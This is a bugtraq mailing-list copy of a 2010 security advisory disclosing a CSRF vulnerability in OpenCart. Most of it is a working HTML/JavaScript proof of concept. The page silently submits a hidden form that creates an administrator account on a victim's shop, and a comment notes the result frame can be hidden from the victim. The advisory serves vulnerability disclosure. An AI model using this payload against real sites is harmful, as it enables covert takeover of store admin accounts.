[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

OpenCart CSRF Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: OpenCart CSRF Vulnerability
From: ben@xxxxxxxxxxxxxxxx
Date: 2 Feb 2010 15:13:25 -0000

Advisory Information:

Title: OpenCart CSRF Vulnerability
Advisory URL:
http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/
Date published: 2010-01-28
Vendors contacted: OpenCart
Security Risk: High

Vulnerability Description:

OpenCart is vulnerable to CSRF attacks using the POST method. It is possible to 
craft a malicious page that will create an administrator user when the victim, 
who is logged into OpenCart, visits the malicious page.

Proofs of Concept:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
    <title>OpenCart CSRF Vulnerability</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <script type="text/javascript">
                function csrfInjection()
                {
                        var params = {
                                                        'username'              
: 'an_attacker',
                                                        'firstname'             
: 'attack',
                                                        'lastname'              
: 'user',
                                                        'email'                 
: 'some.user@xxxxxxxxxxxxxxxxxxxxxxx',
                                                        'user_group_id' : '1', 
//Default group id for administrator level is 1
                                                        'password'              
: 'test',
                                                        'confirm'               
: 'test',
                                                        'status'                
: '1'
                                                 };
                        
                        var form = document.createElement("form");
                        form.setAttribute("method", "post");
                        form.setAttribute("action", 
document.getElementById('site_url').value + 
"/index.php?route=user/user/insert");

                        for(var key in params) {
                                var hiddenField = 
document.createElement("input");
                                hiddenField.setAttribute("type", "hidden");
                                hiddenField.setAttribute("name", key);
                                hiddenField.setAttribute("value", params[key]);

                                form.appendChild(hiddenField);
                        }

                        attack_result.document.body.appendChild(form);
                        form.submit();
                }
        </script>
  </head>
  <body>
    OpenCart CSRF Vulnerability

        <input type="text" name="site_url" id="site_url" size="50" 
/>/index.php?route=user/user/insert<br />
        <a href="#" onclick="csrfInjection();return false;">Add User</a>

        <p>Results: (this frame can be hidden so the user never knows the 
attack was performed)</p>
        <iframe id="attack_result" name="attack_result" width="600" 
height="600"></iframe>
  </body>
</html>

Prev by Date: [SECURITY] [DSA 1987-1] New lighttpd packages fix denial of service
Next by Date: [security bulletin] HPSBUX02479 SSRT090212 rev.1 - HP-UX running HP CIFS Server (Samba), Remote Unauthorized Access
Previous by thread: [SECURITY] [DSA 1987-1] New lighttpd packages fix denial of service
Next by thread: [security bulletin] HPSBUX02479 SSRT090212 rev.1 - HP-UX running HP CIFS Server (Samba), Remote Unauthorized Access
Index(es):
- Date
- Thread